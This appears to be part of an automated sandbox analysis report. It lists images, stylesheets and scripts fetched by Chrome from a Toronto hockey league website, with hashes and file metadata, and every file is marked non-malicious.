                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................m............................!1."AQ..a..2Rq......#3BSW.....8TV..$brv...%467Cdu...5EFUcst...&'DG..9Xefw.......................................E..........................!1A..QR...."STaq.....#B..2...35CDbs..r...............?...B+.R+.d ...........3..B.C0....!....H...!.!.@.B..1...~X.Y..!...p."..!.....O,...l..%.?.'...rW4.<...*E.o*..s.t..py..8.9..GO.$..B..I#.(.P......Q.I8..Ts..@..S...Q.U....%[...d..=c.B..#8.. .p..........E9@....a.C..r..1...(|".E@@...+...`...A....N.^Y......".......8..1\...R.`.yEb..o.....1.O2A /..!......Ynm.9%..o(..W>..".4V...TE. ......!.!.@.B......!.!.@.B......!.!.@.B........1....<".L.....@..HE .!...B.... .!...B.B.H...=.S..Tb.rJ~X.J.a..X..R...R..q.`..g.<F\.......yIJy.lT.r1..(..w..9..Y..N.e)Q.$sm....A..8.......x........E..?.=>S........|.u..<....&....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 730x548, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):111059
                                                                                                                          Entropy (8bit):7.980192975593345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:2Octox3k18HquGAn/naQ9HawK5PXBfjF0ChMTKn:73k4PPacRgXhjF0h+
                                                                                                                          MD5:95A8B191AC15E774984B63D2BA3E3E23
                                                                                                                          SHA1:F9F9ADB3C6A84FA3A7CA99A714054C78DE741095
                                                                                                                          SHA-256:46911809ACD00B8B06BBDCB6A68A0261CBE281A2043D8046E6B5DDD448A6308F
                                                                                                                          SHA-512:1EB7A05DDB94C2D66B46EA04BE62E5EB264CB1271EE2017036F7254B838576FC9125BE66AB52B0A2C96D31687E61C600D7E4A6AD8B2A7EE1042B35D4852DEC17
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....H.H.....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......$....".........................................P.........................!.1.AQ.."aq.2...#BR..3b..$Cr.....%4S....cs...&6De....................................9........................!.1A."Q2a..q..#B.....3..$Rb..CS............?..4....#:@F.Z1..|.(.]Q.[...Q.BWn....F...ri......l....0T...j.o..0U.;_..>...q...?...:.L..dy'D`....}.k.u}....B<C..(......4}.Z...{..#fRF.;....[..k6..MF....$...d.JwM.....B../1#F..b...i.wP..X.5'.l....W..$...R......i==$S.7...QH..q.......=7.:..e4.H.w......._W...b.L...,.=?PP....1...U.<....}..A..s........|T'......O.ur..Yk..#.h..B.{.[<zS....k).f.f..._l!..z_l...vV[X5.^.2.....@...H...L...........SK.4...5..&.Y..5.r=)u=.h.,.......d.C..Z.Q...t2,...&.?1L...I..Gyg.n..`....Z..........x.d........O.Z.z...*..F.4.s..6H.M.#.PI...I#..5.....G....b;h"....G.]..W.9 .`...A.'...s......_........R._t
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 300 x 250, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):138064
                                                                                                                          Entropy (8bit):7.990966101533749
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:7emsKpfjb2N4pFldAlHBI8nFYEz5rZ6LNpQvZvX7ph:7cKhjKGpJGh3ndzuPQR
                                                                                                                          MD5:D3EB58B6C3D8FADEF5C2AAE231CFE247
                                                                                                                          SHA1:C630DDA3C60E4E059F482AA13AF998107C7FDDE5
                                                                                                                          SHA-256:FE718ECBFD27B19F8673ECEB0AFFF09E35B5B3B74DA1592F1EB1113C0428C265
                                                                                                                          SHA-512:D6D4B124E1A4A60FD385CBC1D89E5F5D1884A832B845F57C286E59DC720B7D73FF15E5671B05B1ACA3BBC1E1078753F1AECE126771251AF5786D2B9E7CFB86B3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tpc.googlesyndication.com/simgad/6748781946646920212
                                                                                                                          Preview:.PNG........IHDR...,..........mz.....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65529), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):143310
                                                                                                                          Entropy (8bit):5.01397380003713
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:n+oxLKvMCwIgJvInU7SMyQI6bNQYC8mlsjCQwm9Sh7/ZM8zKAEFWupiij:9SMFYc
                                                                                                                          MD5:4BB31D5A7E5C9B02CF93B8960C72D6E1
                                                                                                                          SHA1:56F97B8EE7EC48231960A6F068BAE19CD144AAB8
                                                                                                                          SHA-256:FDFB69D0C0768E7673017B48E50AFF8D2AC9C814630896F7FEAFB85F5A351A01
                                                                                                                          SHA-512:EE92DAC4E4E12888963CFBFE96A1551916896A147BBD9C979218D99E1E41A5AC2EF000E0E55CE73D8D27F1FD0490D54B3296ECEDF8927790A39DFF93B143173C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/base/assets/dist/css/core.css
                                                                                                                          Preview:.@import url(https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css);@import url(https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,700,300,600);.filter-group__toggle-button:active,.scoreboard__header-close:active,.top-menu__site-logo:active,.left-menu__header-close:active,.menu__open-side-menu:active,.menu__open-scoreboard:active{transform:translateY(0) scale(0.85);transition:transform 0.2s cubic-bezier(0.74, 0, 0.45, 1);transform-origin:50% 50%}.team-border--cpl,.team-border--cpl-db{border-color:#22356F}.team-bg--cpl,.team-bg--cpl-db{background-color:#22356F;color:#fff}.team-logo--cpl,.team-logo--cpl-db{background-position:center center;background-repeat:no-repeat;background-image:url("https://cpl-wordpress-uploads.s3.amazonaws.com/assets/images/logos/cpl.png");background-size:100%}.team-border--kw,.team-border--kw-db{border-color:#78BE20}.team-bg--kw,.team-bg--kw-db{background-colo
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 730 x 640, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):605320
                                                                                                                          Entropy (8bit):7.9956928548165305
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:zIroe/Wx1WvzhDB2UixTUbWCMHXf1C89HGrluX4J5pZx5Nsx:zIroe+x1WvrabXf1tLXk5pLsx
                                                                                                                          MD5:634EB1F5D73456C536AEB9CD8CB923D5
                                                                                                                          SHA1:E4F9160A9BFAD6D2E3F085CE7C8ECCB9F3D09DB5
                                                                                                                          SHA-256:C210CEC81E5030D1C83DB84250A23A84BBC216CA13F3614035344F807CE605D5
                                                                                                                          SHA-512:A90DF7F1B71E02275D093D690A1EA72EE28C2CEFFD66C83E301F9973EEC557D7A25A1B90FB23FF4738C92AF80FB5CA506460F43087F606622C214C7B681AE73C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR....................IDATx....$G..........{..D..D.Y..5..9....9<...uH....a..;;.r......#|_lS.y. ...jj... ..O...p7WS............ ".(J.%.b.eYb.!...=E1G.....cP....|I.....o...bP....#t.+|y..?+.."..c.h....p.*./.@..%...A5.......c.kU.K.oL..g.#...x..{Y./.w.TP..ZR.......x.T._...IZ..}..5!......%.. x.$.C.x_.k.<.....dM...Q.k,...>#......zD..B.O........x.....i.Y...w}..;....7.%.s....{?..-t.....e...nX...g'~.h.:Y...,^_.n......xz......|...^.y.:...........t.....w.K.....yTg.U~.y..............s..=.+]..".&.O5.z..../...}.u...3O.g.'h...?...&.....{%.2.<..GUq..,...o...#.F.W.o.kl..V?W]C.>D.#.1.cL..l..z....O.w.E.].+.}..;.c}/$.;.Y.....ay....y.^..".Pi....Pg.W..........D0..5.......H......k.|.J%.......4+%^t...>4.....S..&@...4......9.....wV?.x.U.6....D,9;.{A{.,..](...`.."*`L\7..!&.O....a]..t...".c....^#..:....TM..P...:....d.Y\..,.a.....v..I>d.7.]...<@.iF.......]`..I.. W..Wu.zi...@.+.....yv..^..DM.....z.H.G..j.{<&.rR.8.N.jy..g#/...S....qY.Q....oA$.k.........k.)...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65212)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):708666
                                                                                                                          Entropy (8bit):5.1690274729760315
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:D9hfq6ni1ovXGT8FiTanS+EFMR7IaG5mZONxfG2:DTni1ovXGTFTanS+EFMR7IaG5mAxfG2
                                                                                                                          MD5:4D404D20D2F23C7BA9B72B65859907CC
                                                                                                                          SHA1:97FD4F1FC1781DFC263776A8699FB1E2C8816DC2
                                                                                                                          SHA-256:D5006529CC66DE4CAD86CEBA18949F3E4EAFFBCFAEFF3918D9C29F244A3ABF29
                                                                                                                          SHA-512:E28FF2030CB6FE92882B94D76628191E440AC671E2B1F0898DA28B0BC518596E21868403BF22E8D88DF91DC65FFA4331C36F05CB5E7C6221471B706183F088D4
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://secure.widget.cloud.opta.net/v3/css/v3.all.opta-widgets.css
                                                                                                                          Preview:/**. * opta-widgets - v3.236.0. * Copyright (c) 2024 Opta Sports. * Licenses: http://widget.cloud.opta.net/v3/licences.txt. */..@import url(https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700;900&display=swap);.@import url(https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700;900&display=swap);..Opta div,.Opta span,.Opta h2,.Opta h3,.Opta h4,.Opta p,.Opta a,.Opta abbr,.Opta img,.Opta dl,.Opta dt,.Opta dd,.Opta ul,.Opta ol,.Opta li,.Opta form,.Opta fieldset,.Opta figure,.Opta figcaption,.Opta label,.Opta legend,.Opta table,.Opta tbody,.Opta thead,.Opta tfoot,.Opta tr,.Opta th,.Opta td,.Opta canvas{margin:0;padding:0;border:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;font-size:12px;font-style:normal;font-weight:normal;vertical-align:baseline;line-height:1.1}.Opta a{background:rgba(0,0,0,0);word-wrap:break-word}.Opta a:active,.Opta a:hover{outline:0}.Opta abbr{text-decoration:no
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):327
                                                                                                                          Entropy (8bit):4.323569472988231
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:vUYj3Se6yBaG3dHW+nt2DGqX3vmAv4Ky8k8Qr:2lyBVPn1aeAq8kl
                                                                                                                          MD5:B527EB8DB37325C5A9B81EBAC8F1B8AD
                                                                                                                          SHA1:48E00EC552BF39E067E40C74C5DE10F7711FFDA8
                                                                                                                          SHA-256:0DDE6737DCFD63FECB42D36A804D2D771FE807082BC743E78A26A90569DC55CE
                                                                                                                          SHA-512:D3A576AC546DDF0EC8108EE6AB6D3CA1C1079A73A88A01786F1C5961B48D110B8F59DEE56C7938846754576A10BAAC585A67AA5CE537E1CF925ADB2A2AC177F9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.icl_lang = icl_vars.current_language;.icl_home = icl_vars.icl_home;..function addLoadEvent(func) {. var oldonload = window.onload;. if (typeof window.onload != 'function') {. window.onload = func;. } else {. window.onload = function() {. if (oldonload) {. oldonload();. }. func();. }. } .}.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=9, manufacturer=Canon, model=Canon EOS 2000D, orientation=upper-left, xresolution=144, yresolution=152, resolutionunit=2, datetime=2023:11:26 00:31:55], baseline, precision 8, 730x380, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):58210
                                                                                                                          Entropy (8bit):7.934804587571897
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:KX1Z4oJfIr8dLn6pMPU0fUzWg3gN8N71l6iYfL:s4GG8B60U0MZzZ4fL
                                                                                                                          MD5:0086C3B9B8E62A82DBEEFF358F329FEA
                                                                                                                          SHA1:3A4A4DF55D401F09AFD7849F22FAE1B58BB22FCF
                                                                                                                          SHA-256:8EE378A0B460259D32C5788EE05C5402973C3ACDF1F3CB636BA61AF83ED472D7
                                                                                                                          SHA-512:115C84A3B374C48E5A0686A75B9233D20CDF1B402BAEE21D72156A2508DDB0627DE068B3E099D6FE5E1038D6282E90A93EA8A96E0D31B45DA6FEDDD2820E9DCF
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/10/10123452/IMG_7761-e1728578153211-730x380.jpg
                                                                                                                          Preview:......JFIF.....H.H.....,Exif..MM.*.................z.................................................(...........2.......................i..............Canon.Canon EOS 2000D....H.......H....2023:11:26 00:31:55..#...........^...........f."...........'...........0...........2..................0230...........n....................................................................................................................98..........98..........98..........0100.......................p................................................................................................1..........2..........4...........5..................... ........2023:11:26 00:31:55.2023:11:26 00:31:55....M..........................u,.........O@......=.....Q287031002628..................................EF-S18-200mm f/3.5-5.6 IS.00004609b9.......(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65212)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):708724
                                                                                                                          Entropy (8bit):5.169862157903459
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:7YhfqRGuhyvXG02dtTanS+EhMR7IFGlmbONxTG2:79GuhyvXG0wTanS+EhMR7IFGlmOxTG2
                                                                                                                          MD5:BFE2594858DD04CC1F4471C47549CC3D
                                                                                                                          SHA1:3E4E08196C747927C74AF89FA62C8399C6843D49
                                                                                                                          SHA-256:C389D9CBCC4CFEEF6CF9AD2981EF12CBC93D9DA84C480FAA59D0AC3F57CF02CA
                                                                                                                          SHA-512:C72C9DBF52FEBA10912C050203D12DF97C6B5652BA8467CAD14B8680796CC3E789EED7566AE9959A9EC36D168E2DE0F3F43A42C46798EAB7886343A7FBFAC8E5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://secure.widget.cloud.opta.net/v3/css/v3-mobile.all.opta-widgets.css
                                                                                                                          Preview:/**. * opta-widgets - v3.236.0. * Copyright (c) 2024 Opta Sports. * Licenses: http://widget.cloud.opta.net/v3/licences.txt. */..@import url(https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700;900&display=swap);.@import url(https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700;900&display=swap);..Opta div,.Opta span,.Opta h2,.Opta h3,.Opta h4,.Opta p,.Opta a,.Opta abbr,.Opta img,.Opta dl,.Opta dt,.Opta dd,.Opta ul,.Opta ol,.Opta li,.Opta form,.Opta fieldset,.Opta figure,.Opta figcaption,.Opta label,.Opta legend,.Opta table,.Opta tbody,.Opta thead,.Opta tfoot,.Opta tr,.Opta th,.Opta td,.Opta canvas{margin:0;padding:0;border:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;font-size:14px;font-style:normal;font-weight:normal;vertical-align:baseline;line-height:1.1}.Opta a{background:rgba(0,0,0,0);word-wrap:break-word}.Opta a:active,.Opta a:hover{outline:0}.Opta abbr{text-decoration:no
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2698
                                                                                                                          Entropy (8bit):7.903031751191032
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:S/62QKxtmU2cngsLQIr5+NlaSFIFdK+dsnaF2Z+N0eK0dKGXwUGU2CgIZx05h3vT:SS2Qi3gsUI00F2oXdzLGI7Zah3Zd/z
                                                                                                                          MD5:B3C9CE60DD1D75ED3F597202C82C05E7
                                                                                                                          SHA1:3D1DB4A9060084F50BE6E15889D94634AA088A8C
                                                                                                                          SHA-256:02D530763915CAC5ACD0BC8E772DB4B08776CC6D5F9CC820D65A2EECCE62A4B8
                                                                                                                          SHA-512:4CC92156CE32A5EA1FC016A092F3923B044F88E528FE47750DC5292A1C90988A8243F1998DAF94874400BBA145746A9584AF4F75B4ABECE4A261E2DBE53F4B5E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093928/icons8-instagram-48-1.png
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs................<IDATx...TUe.........{.....`.N:.|+.....g.XMV..3...e/..5.|5N:*VJK.Q.>R+5D. ..|...<...:.w..c..5k...k].w........*J..Y..........x..........u6Y....W.._F.'...WI.`.]C...X..Xr.B-k.C..y4....C;.....d.*j.O..m...YD....Z. ....~..H\s'..O..>.t.&a4..P....d..%....;J.c..NL.B.....?.Ot.Bq..#..M0.L..a&pH...5.2GQp.o.`_...E.kr..N...Kp.LB.<...!.$.<.s.Y.s.l...1....@..lv..6.5../...A.$ .2...nq}f|...UA..d....[...rJ0.U.MV.dV.}^.._'...C...u2......n..Bj'^.^.s.5!..E...$u..K}.%..<..+..........4..1....*/..`?...Kx.7.|.2..V&..".>rM$.2Ws`.i.1r.)~...g.]}v....).7.....<.{./.....c.\*......J.\..nX.p/{k=...VJ.>t.&\M8.{.?.......j.V]..>kY..^K...B.K....{.X..........y.G..?=:....E.]KJ..q*`TKY...e?;.....s..).6....>l.h.u.........)l7$.G..h......TV.}...W.y.w.S.ofFt:....#..s...r.Jp.S.........':.*K.P..w...#...Q.....#...@m.|....s.P....o*...9v.3......|Y@..X.....N...u..F.."./C.....b8l.%.....x....Z.g,..c..`.*:....O...L..B..b........ZI
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):71079
                                                                                                                          Entropy (8bit):7.9733944347586325
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:cmnflmkIdqSxo+1hm+3hX56OwPijWIQyFde9L2l1N7djb:bEQS91hmyhX4OMXIdF4crb
                                                                                                                          MD5:4B609D04EBE6CE1BEBB6D4708144D110
                                                                                                                          SHA1:0247776CCF9DB481574269F9F57BFC4977AD9957
                                                                                                                          SHA-256:51BADEE0F21648A86400A9C5765B6FA704A42A43891C83047486A832BB6527CF
                                                                                                                          SHA-512:E744BD5E27113496A77E4946D345807AD0BFF944ABBC695E446C9632901341D69158808B198AD635C08A1DC526BFADB929B500C980AEE9CEA0AA5A5A469FB1AC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................`.........................!..1A..Qa."q.2...#BR...3b...$Cr..Ss....%46Ddv.....&58ETc....'9tw.....................................D.......................!1...AQ."2aq..........#3B.R...4Cr....$Sbc..............?...u=...0.o5..v..h.z.......$.I=.g.....e.-.Hq.PNI.W}..MF..K.o.f..u..+}.E.b.H...~D.....)%X.mIH.F....H..5...y.%...`$....V...6....C|\.....n..A.......Pu...V.z.k.W).'..?..P..F...XF....8...0>.[K.s..eD..!=..|.j.4...j..G..J........T.....En.pi..ZB....g.j]Ot....0..l7..5...E....RP.w......^b.m.U.W;....,...|...E6.....I(..?v.....sn0.g3.9.J.m.R..JH...a.NV.].V.>.v..a$...n.n>."..q.TW.`..H.N.....:.D.WM...a..c.`f..7... .>[l!.Ej.....6..[.iC.;........E.k....8..HkNY...R.+H..~.Bj..lq.9Q%G..........a.*.4..l....f.b].S.B......`v..R......Z.m...,..g....!....<-$U..Tul.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):85085
                                                                                                                          Entropy (8bit):7.974936848702659
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:z7WRasfLUa2psRDDLh9JhBgBTZaxIBIe85mTGN7FZUgZFi+73u6L7TBmBw95l:z7WAQARatvh1BgBTZmIB18kTGZJp7+Q5
                                                                                                                          MD5:327091DA5210694A7B476201AAAE830F
                                                                                                                          SHA1:6C0F3021498C41B0EFDC8EE0298D115FD7C01246
                                                                                                                          SHA-256:55C2ADD5C16A50FCD6EA5E63C9F74F49842E2E9BFE00FDEBFA555CD6E99B3114
                                                                                                                          SHA-512:A94B8BBEAC5BED4E9DC3C3576269F2B8F799280CCB7D07F69011619903D8FA20A2E4309974E3265C2FAF31793BC771AE5995015906561B7A52AD60EF611B9A33
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................._..........................!.1.AQa.."q2..#BR....3b...$r..C..%&4Sc.....5T'DEd.....6FVefstuv....................................A........................!1.."AQa.2q...#....3B....R..r..4Ccs................?.....y0.......P...-..C..`.U..J..e.G..5.5....XC....+4.xO...~Y.T..aq.@H.V.. ]..m.4.nRgt.Xh..M.H..8...(..D...)# .n...b<T..q{.....q..A..jE8.w%.%_...M.i}.0...........9*@.4.g.m.BT.....m..o.G-.\.$.............N..nnJ....k.D.. ...!?.:.3.+..Y2.z^,.n..$%G.........(...\.p....v.s...K.j...&.S.........U3..K.;TJ....`{.e._...V.1Q^1\?J.T..../.2..zP.P.....2.$75.!.7.Zp...........c...^..*o.i...\V..!^..=EdR_T...O.H...m..$.}..eV.../F'i.O.....99iqj).d`T..l..!/...;.B.V.*.c.V=.U.k.).q.zJ.....m...2....<.6]l.....8..y}V.R.YZ.U.I?.n..36......LI...&+.....vy..H.MCj6...k...jK.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2514)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):23258
                                                                                                                          Entropy (8bit):5.504597621208854
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:yio8Z2kqX/Qd1jZdiAsoS/bX0K7ejJSijqkpBV5f3dSAYAGucs/0uy4tD9Wy74Rz:yi3AkqX/Qd1jktzX0K7ejAi2+VF3dSsg
                                                                                                                          MD5:64785F81B62786F345764A8D16DC2AA4
                                                                                                                          SHA1:D8F1CCE268693D2FCCA801A01232DE4F6CEC5085
                                                                                                                          SHA-256:165201BD9401B2348DAEACB724E739C22ECC4D1B85757BFEB5ED8D2CE114704C
                                                                                                                          SHA-512:ADA0E6F7DF8F7BA12D71EBD5F03E6B63155A8DE2B35038F756FC326F694D6DB25781B64AC9C131E5CB91935E1E7B601A89230AC116AAB971208619B7F0B007CD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tpc.googlesyndication.com/pagead/js/r20250109/r20110914/abg_lite_fy2021.js
                                                                                                                          Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a){return a};function ba(a){m.setTimeout(()=>{throw a;},0)};var da,n;a:{for(var ea=["CLOSURE_FLAGS"],p=m,fa=0;fa<ea.length;fa++)if(p=p[ea[fa]],p==null){n=null;break a}n=p}var ha=n&&n[610401301];da=ha!=null?ha:!1;var q;const ia=m.navigator;q=ia?ia.userAgentData||null:null;function ja(a){return da?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function u(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function v(){return da?!!q&&q.brands.length>0:!1}function ka(){return v()?ja("Chromium"):(u("Chrome")||u("CriOS"))&&!(v()?0:u("Edge"))||u("Silk")};function la(a){la[" "](a);return a}la[" "]=function(){};!u("Android")||ka();ka();u("Safari")&&(ka()||(v()?0:u("Coast"))||(v()?0:u("Opera"))||(v()?0:u("Edge"))||(v()?ja("Microsoft Edge"):u("Edg/"))||v()&&ja("Opera"));let ma=void 0;var na=new Set;function oa(a,b=!
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (9959)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10056
                                                                                                                          Entropy (8bit):5.308628526814024
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:kZrk/GNyd31svs7wkX8KzJcqSDdAcHX4YE5NLR:srhNyNO0kkMKzFSDdAcIYwLR
                                                                                                                          MD5:7121994EEC5320FBE6586463BF9651C2
                                                                                                                          SHA1:90532AFF6D4121954254CDF04994D834F7EC169B
                                                                                                                          SHA-256:48EB8B500AE6A38617B5738D2B3FAEC481922A7782246E31D2755C034A45CD5D
                                                                                                                          SHA-512:B74A2F03C64E883B9A34DE43690429327DFB4AA230A7A6AFCA8150A16E3D84E98461245FF264C26368D9904562CC34FE219F71F951D364FA5C68C039B76776CD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*! jQuery Migrate v1.4.1 | (c) jQuery Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(a,b,c){function d(c){var d=b.console;f[c]||(f[c]=!0,a.migrateWarnings.push(c),d&&d.warn&&!a.migrateMute&&(d.warn("JQMIGRATE: "+c),a.migrateTrace&&d.trace&&d.trace()))}function e(b,c,e,f){if(Object.defineProperty)try{return void Object.defineProperty(b,c,{configurable:!0,enumerable:!0,get:function(){return d(f),e},set:function(a){d(f),e=a}})}catch(g){}a._definePropertyBroken=!0,b[c]=e}a.migrateVersion="1.4.1";var f={};a.migrateWarnings=[],b.console&&b.console.log&&b.console.log("JQMIGRATE: Migrate is installed"+(a.migrateMute?"":" with logging active")+", version "+a.migrateVersion),a.migrateTrace===c&&(a.migrateTrace=!0),a.migrateReset=function(){f={},a.migrateWarnings.length=0},"BackCompat"===document.compatMode&&d("jQuery is not compatible with Quirks Mode");var g=a("<input/>",{size:1}).attr("size")&&a.attrFn,h=a.att
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):46468
                                                                                                                          Entropy (8bit):5.32662258770376
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:+aOClrtSZvbqY490nVg3Of0wt32vSqY49NnSzdOhqqt5Iv0qY49HnQd+OWJ3tWNP:4HjMuOA8IgbXdUw/rVfQy
                                                                                                                          MD5:459C411CE18CCC2EABB7A5E308C7EF28
                                                                                                                          SHA1:1A005E550EFD08BBAF2517B5F8D0C6C2E49090EC
                                                                                                                          SHA-256:95BCC070D09C68DE23C817450C4D12A2127C310C76213634E3FE8E97706020A0
                                                                                                                          SHA-512:728EDC8CAD459DBCA03749325757585E34BC5CE1B0EB6879ACF1E4AA04DBEB01D788D40A172F371430F7FCCC0132E339801E960BC7091242F33FF8E41797E02C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:"https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,700,300,600"
